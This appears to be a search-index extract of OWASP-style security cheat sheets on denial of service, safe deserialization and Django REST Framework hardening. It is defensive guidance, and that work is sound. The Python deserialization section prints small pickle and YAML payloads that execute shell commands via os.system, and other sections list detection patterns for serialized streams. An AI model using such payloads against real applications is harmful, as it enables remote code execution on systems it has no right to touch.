This cheat sheet provides an overall, common overview with informative, straight-to-the-point guidance, proposing angles on how to battle denial of service (DoS) attacks on different layers. It is by no means complete; however, it should serve as an indicator to inform the reader and to introduce a workable methodology to tackle this issue.

"},{"location":"cheatsheets/Denial_of_Service_Cheat_Sheet.html#fundamentals","title":"Fundamentals","text":"

Considering that anti-DoS approaches are not one-step solutions, it becomes apparent that, for them to be implemented, it's necessary to involve different profiles within your organization to assess the actual situation and to apply countermeasures accordingly. These profiles are: developers and architects in the areas of application and infrastructure.

Key concepts within information security revolve around criteria or properties such as the CIA triad. The letter A, which stands for availability, is our focal point. The core essence of a DoS is to affect, by any means, the availability of instances or objects and to eventually render them inaccessible. Thus, for any information system to serve its purpose, it must be available at any time. That is why every computing system within the interoperability flow must function correctly to achieve that.

To remain resilient and resistant, it's imperative - and suggested - to outline and to conduct a thorough analysis on components within your inventory based on functionality, architecture and performance (i.e. application-wise, infrastructure and network related).

The outcome of this research should identify potential causes of a DoS which highlight single points of failure, ranging from programming related errors to resource exhaustion.

From a prevention point of view, it's important to have a clear picture on how to tackle your appropriate components to address the issue at stake (e.g. bottlenecks, etc.). That's why a solid understanding of your environment is essential to develop a suitable defence mechanism. These could be aligned with:

  1. scaling options (up = inner hardware components, out = the number of complete components)
  2. existing conceptual / logical techniques (such as applying redundancy measures, bulkheading, etc. - which expand your in-house capabilities)
  3. a cost analysis applied to your situation

Within this document we adhere to a particular guidance structure to illustrate how to analyse this subject based on your situation. It is by no means a complete approach, but it provides fundamental building blocks to assist you in constructing anti-DoS concepts that fit your needs.

"},{"location":"cheatsheets/Denial_of_Service_Cheat_Sheet.html#general-categories-and-basic-controls","title":"General Categories and Basic Controls","text":"

In this cheat sheet, we will adhere to the DDoS classification as documented by CERT-EU. That document categorizes attacks across the 7 OSI model layers into three main categories, namely application, session and network attacks.

TODO: Add Diagram

Application attacks focus on rendering applications unavailable by exhausting resources or by making them unusable in a functional way. Session (or protocol) attacks focus on consuming server resources, or resources of intermediary equipment like firewalls and load balancers. Network (or volumetric) attacks focus on saturating the bandwidth of the network resource. It is important to understand that each of these three attack categories needs to be considered when designing a DoS-resilient solution.

Note that OSI model layers 1 and 2 are not included in this categorization. In the spirit of providing a complete overview of all DoS attack types, we will briefly discuss these layers and how DoS applies to them.

The physical layer consists of the networking hardware transmission technologies of a network. It is a fundamental layer underlying the logical data structures of the higher-level functions in a network. Typical DoS scenarios are destruction, obstruction and malfunction. An example is a case where an elderly Georgian woman sliced through an underground cable, resulting in loss of internet for the whole of Armenia.

The data link layer is the protocol layer that transfers data between adjacent network nodes in a wide area network (WAN) or between nodes on the same local area network (LAN) segment. Typical DoS scenarios are MAC flooding (targeting switch MAC tables) and ARP poisoning.

In MAC flooding attacks, a switch is flooded with packets, each with a different source MAC address. The intention is to consume the limited memory used by a switch to store the MAC and physical port translation table (MAC table). The result is that valid MAC addresses are purged and the switch enters a fail-over mode where it acts as a network hub. All data is then forwarded to all ports, resulting in data leakage. TODO impact in relation to DoS TODO document compact remediation

In ARP poisoning attacks, a malicious actor sends spoofed ARP (Address Resolution Protocol) messages over the wire. The result is that the attacker's MAC address can be linked to the IP address of a legitimate device on the network. This allows an attacker to intercept, modify or stop data in transit that was intended for the victim IP address. The ARP protocol is specific to the local area network and could cause a DoS of the on-wire communication.

Packet filtering technology can be used to inspect packets in transit to identify and block offending ARP packets. Another approach is to use static ARP tables, but they prove difficult to maintain.

"},{"location":"cheatsheets/Denial_of_Service_Cheat_Sheet.html#application-attacks","title":"Application attacks","text":"

Application layer attacks focus on rendering applications unavailable by exhausting resources or by making them unusable in a functional way. These attacks do not have to consume the network bandwidth to be effective. Rather, they place an operational strain on the application server in such a way that the server becomes unavailable, unusable or non-functional. All attacks exploiting weaknesses in the OSI layer 7 protocol stack are generally categorised as application attacks. They are the most challenging to identify and mitigate.

TODO: List all attacks per category. Because we cannot map remediations one on one with an attack vector, we will first need to list them before discussing the action points

Slow HTTP is a DoS attack type where HTTP requests are sent very slowly and in fragments, one at a time. Until the HTTP request is fully delivered, the server keeps resources stalled while waiting for the missing incoming data. At some point, the server will reach the maximum concurrent connection pool, resulting in a DoS. From an attacker's perspective, slow HTTP attacks are cheap to perform because they require minimal resources.

"},{"location":"cheatsheets/Denial_of_Service_Cheat_Sheet.html#software-design-concepts","title":"Software Design Concepts","text":""},{"location":"cheatsheets/Denial_of_Service_Cheat_Sheet.html#session","title":"Session","text":""},{"location":"cheatsheets/Denial_of_Service_Cheat_Sheet.html#input-validation","title":"Input validation","text":""},{"location":"cheatsheets/Denial_of_Service_Cheat_Sheet.html#access-control","title":"Access control","text":""},{"location":"cheatsheets/Denial_of_Service_Cheat_Sheet.html#network-attacks","title":"Network attacks","text":"

TODO: (Develop text) Attacks where network bandwidth gets saturated. Volumetric in nature. Amplification techniques make these attacks effective.

TODO: (list attacks) NTP amplification, DNS amplification, UDP flooding, TCP flooding

"},{"location":"cheatsheets/Denial_of_Service_Cheat_Sheet.html#network-design-concepts","title":"Network Design Concepts","text":""},{"location":"cheatsheets/Denial_of_Service_Cheat_Sheet.html#rate-limiting","title":"Rate limiting","text":"

Rate limiting is the process of controlling traffic rate from and to a server or component. It can be implemented on infrastructure as well as on an application level. Rate limiting can be based on (offending) IPs, on IP block lists, on geolocation, etc.
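
As a minimal illustration of application-level rate limiting, the sketch below implements an in-memory token bucket keyed per client; the class and method names (TokenBucket, allow_request) are hypothetical, and a production setup would typically use shared storage and sit behind infrastructure-level controls as well.

import time\n\nclass TokenBucket:\n    def __init__(self, rate_per_sec, burst):\n        self.rate = rate_per_sec\n        self.burst = burst\n        self.buckets = {}  # client_id -> (tokens, last_refill)\n\n    def allow_request(self, client_id):\n        tokens, last = self.buckets.get(client_id, (self.burst, time.monotonic()))\n        now = time.monotonic()\n        # Refill tokens based on elapsed time, capped at the burst size\n        tokens = min(self.burst, tokens + (now - last) * self.rate)\n        allowed = tokens >= 1\n        self.buckets[client_id] = (tokens - 1 if allowed else tokens, now)\n        return allowed\n\nlimiter = TokenBucket(rate_per_sec=5, burst=10)\nprint(limiter.allow_request(\"203.0.113.7\"))  # True until the bucket is drained\n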

"},{"location":"cheatsheets/Denial_of_Service_Cheat_Sheet.html#isp-level-remediations","title":"ISP-Level remediations","text":""},{"location":"cheatsheets/Denial_of_Service_Cheat_Sheet.html#global-level-remediations-commercial-cloud-filter-services","title":"Global-Level remediations: Commercial cloud filter services","text":""},{"location":"cheatsheets/Denial_of_Service_Cheat_Sheet.html#related-articles","title":"Related Articles","text":""},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html","title":"Deserialization Cheat Sheet","text":""},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This article is focused on providing clear, actionable guidance for safely deserializing untrusted data in your applications.

"},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#what-is-deserialization","title":"What is Deserialization","text":"

Serialization is the process of turning some object into a data format that can be restored later. People often serialize objects in order to save them for storage, or to send as part of communications.

Deserialization is the reverse of that process, taking data structured in some format, and rebuilding it into an object. Today, the most popular data format for serializing data is JSON. Before that, it was XML.

However, many programming languages have native ways to serialize objects. These native formats usually offer more features than JSON or XML, including customizability of the serialization process.

Unfortunately, the features of these native deserialization mechanisms can sometimes be repurposed for malicious effect when operating on untrusted data. Attacks against deserializers have been found to allow denial-of-service, access-control bypass, and remote code execution (RCE) attacks.

"},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#guidance-on-deserializing-objects-safely","title":"Guidance on Deserializing Objects Safely","text":"

The following language-specific guidance attempts to enumerate safe methodologies for deserializing data that can't be trusted.

"},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#php","title":"PHP","text":""},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#whitebox-review","title":"WhiteBox Review","text":"

Check the use of the unserialize() function and review how external parameters are accepted. Use a safe, standard data interchange format such as JSON (via json_decode() and json_encode()) if you need to pass serialized data to the user.

"},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#python","title":"Python","text":""},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#blackbox-review","title":"BlackBox Review","text":"

If the traffic data ends with the symbol dot ., it's very likely that the data was sent as a serialized (pickle) payload.

"},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#whitebox-review_1","title":"WhiteBox Review","text":"

The following Python APIs are vulnerable to serialization attacks. Search the code for the patterns below; a sketch of safer alternatives follows the list.

  1. The uses of pickle/c_pickle/_pickle with load/loads:
import pickle\ndata = \"\"\" cos.system(S'dir')tR. \"\"\"\npickle.loads(data)\n
  2. Uses of PyYAML with load:
import yaml\ndocument = \"!!python/object/apply:os.system ['ipconfig']\"\nprint(yaml.load(document))\n
  3. Uses of jsonpickle with encode or store methods.
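
The sketch below (illustrative only, assuming PyYAML is installed) shows the safer counterparts to the patterns above: a pure data format such as JSON instead of pickle, and yaml.safe_load instead of yaml.load for untrusted documents.

import json\nimport yaml\n\nuntrusted_json = '{\"user\": \"alice\", \"role\": \"viewer\"}'\ndata = json.loads(untrusted_json)  # pure data format, no arbitrary object construction\n\nuntrusted_yaml = \"user: alice\"\n# safe_load (equivalent to yaml.load(..., Loader=yaml.SafeLoader)) refuses python/object tags\nconfig = yaml.safe_load(untrusted_yaml)\nprint(data, config)\n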
"},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#java","title":"Java","text":"

The following techniques are all good for preventing deserialization attacks against Java's Serializable format.

Implementation advice:

"},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#whitebox-review_2","title":"WhiteBox Review","text":"

Be aware of the following Java API uses, which are potential sources of serialization vulnerabilities.

1. XMLDecoder with external user-defined parameters

2. XStream with the fromXML method (XStream version <= v1.4.6 is vulnerable to the serialization issue)

3. ObjectInputStream with readObject

4. Uses of readObject, readObjectNoData, readResolve or readExternal

5. ObjectInputStream.readUnshared

6. Serializable

"},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#blackbox-review_1","title":"BlackBox Review","text":"

If the captured traffic data includes the following patterns, it may suggest that the data was sent in Java serialization streams:

"},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#prevent-data-leakage-and-trusted-field-clobbering","title":"Prevent Data Leakage and Trusted Field Clobbering","text":"

If there are data members of an object that should never be controlled by end users during deserialization or exposed to users during serialization, they should be declared with the transient keyword (see the section Protecting Sensitive Information).

For a class that is defined as Serializable, any sensitive information variable should be declared as private transient.

For example, in the class myAccount below, the variables 'profit' and 'margin' are declared transient to prevent them from being serialized:

public class myAccount implements Serializable\n{\nprivate transient double profit; // declared transient\n\nprivate transient double margin; // declared transient\n....\n
"},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#prevent-deserialization-of-domain-objects","title":"Prevent Deserialization of Domain Objects","text":"

Some of your application objects may be forced to implement Serializable due to their hierarchy. To guarantee that your application objects can't be deserialized, a readObject() method should be declared (with a final modifier) which always throws an exception:

private final void readObject(ObjectInputStream in) throws java.io.IOException {\nthrow new java.io.IOException(\"Cannot be deserialized\");\n}\n
"},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#harden-your-own-javaioobjectinputstream","title":"Harden Your Own java.io.ObjectInputStream","text":"

The java.io.ObjectInputStream class is used to deserialize objects. It's possible to harden its behavior by subclassing it. This is the best solution if:

The general idea is to override ObjectInputStream#resolveClass() in order to restrict which classes are allowed to be deserialized.

Because this call happens before a readObject() is called, you can be sure that no deserialization activity will occur unless the type is one that you allow.

A simple example is shown here, where the LookAheadObjectInputStream class is guaranteed to not deserialize any other type besides the Bicycle class:

public class LookAheadObjectInputStream extends ObjectInputStream {\n\npublic LookAheadObjectInputStream(InputStream inputStream) throws IOException {\nsuper(inputStream);\n}\n\n/**\n    * Only deserialize instances of our expected Bicycle class\n    */\n@Override\nprotected Class<?> resolveClass(ObjectStreamClass desc) throws IOException, ClassNotFoundException {\nif (!desc.getName().equals(Bicycle.class.getName())) {\nthrow new InvalidClassException(\"Unauthorized deserialization attempt\", desc.getName());\n}\nreturn super.resolveClass(desc);\n}\n}\n

More complete implementations of this approach have been proposed by various community members:

"},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#harden-all-javaioobjectinputstream-usage-with-an-agent","title":"Harden All java.io.ObjectInputStream Usage with an Agent","text":"

As mentioned above, the java.io.ObjectInputStream class is used to deserialize objects. It's possible to harden its behavior by subclassing it. However, if you don't own the code or can't wait for a patch, using an agent to weave in hardening to java.io.ObjectInputStream is the best solution.

Globally changing ObjectInputStream is only safe for block-listing known malicious types, because it's not possible to know for all applications what the expected classes to be deserialized are. Fortunately, very few classes are needed in the blocklist to be safe from all of the known attack vectors today.

It's inevitable that more \"gadget\" classes will be discovered that can be abused. However, there is an incredible amount of vulnerable software exposed today, in need of a fix. In some cases, \"fixing\" the vulnerability may involve re-architecting messaging systems and breaking backwards compatibility as developers move towards not accepting serialized objects.

To enable these agents, simply add a new JVM parameter:

-javaagent:name-of-agent.jar\n

Agents taking this approach have been released by various community members:

A similar, but less scalable approach would be to manually patch and bootstrap your JVM's ObjectInputStream. Guidance on this approach is available here.

"},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#net-csharp","title":".Net CSharp","text":""},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#whitebox-review_3","title":"WhiteBox Review","text":"

Search the source code for the following terms:

  1. TypeNameHandling
  2. JavaScriptTypeResolver

Look for any serializers where the type is set by a user controlled variable.

"},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#blackbox-review_2","title":"BlackBox Review","text":"

Search for the following base64 encoded content that starts with:

AAEAAAD/////\n

Search for content with the following text:

  1. TypeObject
  2. $type:
"},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#general-precautions","title":"General Precautions","text":"

Microsoft has stated that the BinaryFormatter type is dangerous and cannot be secured. As such, it should not be used. Full details are in the BinaryFormatter security guide.

Don't allow the datastream to define the type of object that the stream will be deserialized to. You can prevent this by for example using the DataContractSerializer or XmlSerializer if at all possible.

Where JSON.Net is being used, make sure TypeNameHandling is only ever set to None.

TypeNameHandling = TypeNameHandling.None\n

If JavaScriptSerializer is to be used then do not use it with a JavaScriptTypeResolver.

If you must deserialise data streams that define their own type, then restrict the types that are allowed to be deserialized. Be aware that this is still risky, as many native .Net types are potentially dangerous in themselves, e.g.

System.IO.FileInfo\n

FileInfo objects that reference files actually on the server can, when deserialized, change the properties of those files (e.g. to read-only), creating a potential denial of service attack.

Even if you have limited the types that can be deserialised, remember that some types have properties that are risky. System.ComponentModel.DataAnnotations.ValidationException, for example, has a property Value of type Object. If this type is allowed for deserialization, then an attacker can set the Value property to any object type they choose.

Attackers should be prevented from steering the type that will be instantiated. If this is possible, then even DataContractSerializer or XmlSerializer can be subverted, e.g.

// Action below is dangerous if the attacker can change the data in the database\nvar typename = GetTransactionTypeFromDatabase();\n\nvar serializer = new DataContractJsonSerializer(Type.GetType(typename));\n\nvar obj = serializer.ReadObject(ms);\n

Execution can occur within certain .Net types during deserialization. Creating a control such as the one shown below is ineffective.

var suspectObject = myBinaryFormatter.Deserialize(untrustedData);\n\n//Check below is too late! Execution may have already occurred.\nif (suspectObject is SomeDangerousObjectType)\n{\n//generate warnings and dispose of suspectObject\n}\n

For JSON.Net it is possible to create a safer form of allow-list control using a custom SerializationBinder.

Try to keep up-to-date on known .Net insecure deserialization gadgets and pay special attention where such types can be created by your deserialization processes. A deserializer can only instantiate types that it knows about.

Try to keep any code that might create potential gadgets separate from any code that has internet connectivity. As an example, System.Windows.Data.ObjectDataProvider used in WPF applications is a known gadget that allows arbitrary method invocation. It would be risky to have a reference to this assembly in a REST service project that deserializes untrusted data.

"},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#known-net-rce-gadgets","title":"Known .NET RCE Gadgets","text":""},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#language-agnostic-methods-for-deserializing-safely","title":"Language-Agnostic Methods for Deserializing Safely","text":""},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#using-alternative-data-formats","title":"Using Alternative Data Formats","text":"

A great reduction of risk is achieved by avoiding native (de)serialization formats. By switching to a pure data format like JSON or XML, you lessen the chance of custom deserialization logic being repurposed towards malicious ends.

Many applications rely on a data-transfer object pattern that involves creating a separate domain of objects for the explicit purpose of data transfer. Of course, it's still possible that the application will make security mistakes after a pure data object is parsed.

"},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#only-deserialize-signed-data","title":"Only Deserialize Signed Data","text":"

If the application knows before deserialization which messages will need to be processed, it could sign them as part of the serialization process. The application could then choose not to deserialize any message which didn't have an authenticated signature.
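
A minimal sketch of this idea, using Python's standard hmac module and a JSON payload (the shared secret and function names are assumptions for illustration; in practice the key would come from a secret manager):

import hashlib\nimport hmac\nimport json\n\nSECRET = b\"replace-with-a-managed-secret\"  # assumption: provided by a secret manager\n\ndef serialize_signed(obj):\n    payload = json.dumps(obj).encode()\n    signature = hmac.new(SECRET, payload, hashlib.sha256).hexdigest()\n    return payload, signature\n\ndef deserialize_verified(payload, signature):\n    expected = hmac.new(SECRET, payload, hashlib.sha256).hexdigest()\n    # Constant-time comparison; unauthenticated messages are never deserialized\n    if not hmac.compare_digest(expected, signature):\n        raise ValueError(\"invalid signature - message rejected\")\n    return json.loads(payload)\n\npayload, signature = serialize_signed({\"action\": \"ship\", \"order\": 42})\nprint(deserialize_verified(payload, signature))\n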

"},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#mitigation-toolslibraries","title":"Mitigation Tools/Libraries","text":""},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#detection-tools","title":"Detection Tools","text":""},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#references","title":"References","text":""},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html","title":"Django REST Framework (DRF) Cheat Sheet","text":""},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This Cheat sheet intends to provide quick basic Django REST Framework security tips for developers.

The Django REST framework abstracts developers from quite a bit of tedious work and provides the means to build APIs quickly and with ease using Django. New developers, those unfamiliar with the inner workings of Django, likely need a basic set of guidelines to secure fundamental aspects of their application. The intended purpose of this doc is to be that guide.

"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#settings","title":"Settings","text":"

All the Django REST Framework (DRF) configuration is done under the namespace REST_FRAMEWORK, usually in the settings.py file. From a security perspective, the most relevant ones are:

"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#default_authentication_classes","title":"DEFAULT_AUTHENTICATION_CLASSES","text":"

A list of authentication classes that determines the default set of authenticators used when accessing the request.user or request.auth properties. In other words, what classes should be used to identify which user is authenticated.

The defaults are 'rest_framework.authentication.SessionAuthentication' and 'rest_framework.authentication.BasicAuthentication', which means that by default session and basic authentication are checked for the user.

"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#default_permission_classes","title":"DEFAULT_PERMISSION_CLASSES","text":"

A list of permission classes that determines the default set of permissions checked at the start of a view.

Permission must be granted by every class in the list. The default is 'rest_framework.permissions.AllowAny', which means that by default every view allows access to everybody.

"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#default_throttle_classes","title":"DEFAULT_THROTTLE_CLASSES","text":"

A list of throttle classes that determines the default set of throttles checked at the start of a view. The default is empty, which means that by default there is no throttling in place.

"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#default_pagination_class","title":"DEFAULT_PAGINATION_CLASS","text":"

The default class to use for queryset pagination. Pagination is disabled by default. Lack of proper pagination could lead to Denial of Service (DoS) in cases where there\u2019s a lot of data.
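
To tie these settings together, the sketch below shows what a hardened REST_FRAMEWORK block in settings.py might look like; the specific classes, rates and page size are illustrative assumptions rather than universal recommendations.

# settings.py (illustrative values - adjust to your project)\nREST_FRAMEWORK = {\n    \"DEFAULT_AUTHENTICATION_CLASSES\": [\n        \"rest_framework.authentication.SessionAuthentication\",\n    ],\n    \"DEFAULT_PERMISSION_CLASSES\": [\n        \"rest_framework.permissions.IsAuthenticated\",  # override the AllowAny default\n    ],\n    \"DEFAULT_THROTTLE_CLASSES\": [\n        \"rest_framework.throttling.AnonRateThrottle\",\n        \"rest_framework.throttling.UserRateThrottle\",\n    ],\n    \"DEFAULT_THROTTLE_RATES\": {\"anon\": \"100/hour\", \"user\": \"1000/hour\"},\n    \"DEFAULT_PAGINATION_CLASS\": \"rest_framework.pagination.PageNumberPagination\",\n    \"PAGE_SIZE\": 50,\n}\n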

"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#owasp-api-security-top-10","title":"OWASP API Security Top 10","text":"

The OWASP API Security Top 10 is a list of the most critical security risks for APIs, developed by the Open Web Application Security Project (OWASP). It is intended to help organizations identify and prioritize the most significant risks to their APIs, so that they can implement appropriate controls to mitigate those risks.

This section is based on this. Your approach to securing your web API should be to start at the top threat (API1 below) and work down; this will ensure that any time spent on security is spent most effectively, covering the top threats first and lesser threats afterwards. After covering the top 10, it is generally advisable to assess for other threats or get a professionally completed penetration test.

"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#api12019-broken-object-level-authorization","title":"API1:2019 Broken Object Level Authorization","text":"

When using object-level permissions:

DO: Validate that the object can be accessed by the user using the method .check_object_permissions(request, obj). Example:

def get_object(self):\n    obj = get_object_or_404(self.get_queryset(), pk=self.kwargs[\"pk\"])\n    self.check_object_permissions(self.request, obj)\n    return obj\n

DO NOT: Override the method get_object() without checking if the request should have access to that object.

"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#api22019-broken-user-authentication","title":"API2:2019 Broken User Authentication","text":"

DO: Use the setting value DEFAULT_AUTHENTICATION_CLASSES with the correct classes for your project.

DO: Have authentication on every non-public API endpoint.

DO NOT: Overwrite the authentication class on a class-based (variable authentication_classes) or function-based (decorator authentication_classes) view unless you are confident about the change and understand the impact.
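
As an illustrative sketch (the view name is hypothetical), a non-public endpoint keeps its authentication and permission classes explicit rather than overriding them away:

from rest_framework.authentication import SessionAuthentication\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\n\nclass AccountSummaryView(APIView):  # hypothetical non-public endpoint\n    # Kept aligned with the project-wide defaults; only narrow them deliberately\n    authentication_classes = [SessionAuthentication]\n    permission_classes = [IsAuthenticated]\n\n    def get(self, request):\n        return Response({\"user\": request.user.username})\n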

"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#api32019-excessive-data-exposure","title":"API3:2019 Excessive Data Exposure","text":"

DO: Review the serializer and the information you are displaying.

If the serializer inherits from ModelSerializer, DO NOT use the exclude Meta property.

DO NOT: Display more information than the minimum required.

"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#api42019-lack-of-resources-rate-limiting","title":"API4:2019 Lack of Resources & Rate Limiting","text":"

DO: Configure the setting DEFAULT_THROTTLE_CLASSES.

DO NOT: Overwrite the throttle class on a class-based (variable throttle_classes) or function-based (decorator throttle_classes) view unless you are confident about the change and understand the impact.

EXTRA: If possible, rate limiting should also be done with a WAF or similar; DRF should be the last layer of rate limiting.

"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#api52019-broken-function-level-authorization","title":"API5:2019 Broken Function Level Authorization","text":"

DO: Change the default value ('rest_framework.permissions.AllowAny') of DEFAULT_PERMISSION_CLASSES.

DO NOT: Use rest_framework.permissions.AllowAny except for public API endpoints.

DO: Use the setting value DEFAULT_PERMISSION_CLASSES with the correct classes for your project.

DO NOT: Overwrite the authorization class on a class-based (variable permission_classes) or function-based (decorator permission_classes) view unless you are confident about the change and understand the impact.

"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#api62019-mass-assignment","title":"API6:2019 Mass Assignment","text":"

When using ModelForms:

DO: Use Meta.fields (allow list approach).

DO NOT: Use Meta.exclude (block list approach).

DO NOT: Use ModelForms.Meta.fields = \"__all__\"
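
A small sketch of the allow-list approach (the Account model and its fields are hypothetical):

from django import forms\n\nfrom myapp.models import Account  # hypothetical model\n\nclass AccountForm(forms.ModelForm):\n    class Meta:\n        model = Account\n        # Allow list: only these fields are bound from user input\n        fields = [\"display_name\", \"email\"]\n        # Avoid Meta.exclude and fields = \"__all__\" (block-list / catch-all approaches)\n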

"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#api72019-security-misconfiguration","title":"API7:2019 Security Misconfiguration","text":"

DO: Set the Django settings DEBUG and DEBUG_PROPAGATE_EXCEPTIONS to False.

DO: Set the Django setting SECRET_KEY to a random value. Never hardcode secrets.

DO: Have a repeatable hardening process leading to fast and easy deployment of a properly locked down environment.

DO: Have an automated process to continuously assess the effectiveness of the configuration and settings in all environments.

DO: Ensure the API can only be accessed via the specified HTTP verbs. All other HTTP verbs should be disabled.

DO NOT: Use default passwords
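
As a sketch of the first two DOs above, settings can be driven by the environment so DEBUG stays off and SECRET_KEY is never hardcoded (the environment variable name is an assumption):

# settings.py (sketch)\nimport os\n\nDEBUG = False\nDEBUG_PROPAGATE_EXCEPTIONS = False\n\n# Fail fast if the secret is not provided by the environment / secret manager\nSECRET_KEY = os.environ[\"DJANGO_SECRET_KEY\"]\n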

"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#api82019-injection","title":"API8:2019 Injection","text":"

DO: Validate, filter, and sanitize all client-provided data, or other data coming from integrated systems.

"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#sqli","title":"SQLi","text":"

DO: Use parameterized queries.

TRY NOT TO: Use dangerous methods like raw(), extra() and custom SQL (via cursor.execute()).

DO NOT: Add user input to dangerous methods (raw(), extra(), cursor.execute()).
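
If raw SQL cannot be avoided, pass user input as parameters rather than concatenating it into the query string; a minimal sketch with Django's raw() (the model name is hypothetical):

from myapp.models import Account  # hypothetical model\n\ndef find_accounts(email):\n    # The %s placeholder keeps user input out of the SQL string itself\n    return Account.objects.raw(\n        \"SELECT * FROM myapp_account WHERE email = %s\", [email]\n    )\n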

"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#rce","title":"RCE","text":"

DO NOT: Add user input to dangerous methods (eval(), exec() and execfile()).

DO NOT: Load user-controlled pickle files. This includes the pandas method pandas.read_pickle().

DO NOT: Load user-controlled YAML files using the method load().

DO: Use the Loader=yaml.SafeLoader for YAML files.
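
A short illustration of the last two points, assuming PyYAML:

import yaml\n\nuntrusted_doc = \"retries: 3\"\n# Safe: the SafeLoader cannot instantiate arbitrary Python objects from the document\nconfig = yaml.load(untrusted_doc, Loader=yaml.SafeLoader)  # or simply yaml.safe_load(untrusted_doc)\nprint(config)\n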

"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#api92019-improper-assets-management","title":"API9:2019 Improper Assets Management","text":"

DO: Have an inventory of all API hosts and document important aspects of each one of them, focusing on the API environment (e.g., production, staging, test, development), who should have network access to the host (e.g., public, internal, partners) and the API version.

DO: Document all aspects of your API such as authentication, errors, redirects, rate limiting, cross-origin resource sharing (CORS) policy and endpoints, including their parameters, requests, and responses.

"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#api102019-insufficient-logging-monitoring","title":"API10:2019 Insufficient Logging & Monitoring","text":"

DO: Log all failed authentication attempts, denied access, and input validation errors with sufficient user context to identify suspicious or malicious accounts.

DO: Create logs in a format suited to be consumed by a log management solution, including enough detail to identify the malicious actor.

DO: Handle logs as sensitive data and guarantee their integrity at rest and in transit.

DO: Configure a monitoring system to continuously monitor the infrastructure, network, and the API functioning.

DO: Use a Security Information and Event Management (SIEM) system to aggregate and manage logs from all components of the API stack and hosts.

DO: Configure custom dashboards and alerts, enabling suspicious activities to be detected and responded to earlier.

DO: Establish effective monitoring and alerting so suspicious activities are detected and responded to in a timely fashion.

DO NOT: Log generic error messages such as Log.Error(\"Error was thrown\"); rather, log the stack trace, the error message and the ID of the user who caused the error.

DO NOT: Log sensitive data such as users' passwords, API tokens or PII.
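
As a hedged sketch of these logging DOs using Python's standard logging module (the logger name and extra fields are illustrative):

import logging\n\nlogger = logging.getLogger(\"api.security\")\n\ndef log_failed_login(request, username):\n    # Enough context to spot suspicious accounts, without passwords, tokens or PII\n    logger.warning(\n        \"authentication failure\",\n        extra={\n            \"event\": \"auth.failed\",\n            \"username\": username,\n            \"source_ip\": request.META.get(\"REMOTE_ADDR\"),\n            \"path\": request.path,\n        },\n    )\n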

"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#other-security-risks","title":"Other security Risks","text":"

Below is a list of security risks for APIs not discussed in the OWASP API Security Top 10.

"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#business-logic-bugs","title":"Business Logic Bugs","text":"

Any application in any technology can contain business logic errors that result in security bugs. Business logic bugs are difficult to impossible to detect using automated tools. The best ways to prevent business logic security bugs are to do threat modeling, security design reviews, code reviews, pair programming and to write unit tests.

"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#secret-management","title":"Secret Management","text":"

Secrets should never be hardcoded. The best practice is to use a Secret Manager. For more information, review the OWASP Secrets Management Cheat Sheet.

"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#updating-django-and-drf-and-having-a-process-for-updating-dependencies","title":"Updating Django and DRF and Having a Process for Updating Dependencies","text":"

A concern with every application, including Python applications, is that dependencies can have vulnerabilities.

One good practice is to audit the dependencies your project is using.

In general, it is important to have a process for updating dependencies. An example process might define three mechanisms for triggering an update of a dependency:

The Django security team has information on how Django discloses security issues.

Finally, an important aspect when considering whether a new dependency should be added to the project is the \"Security Health\" of the library. How often is it updated? Does it have known vulnerabilities? Does it have an active community? Some tools can help with this task (e.g. Snyk Advisor).

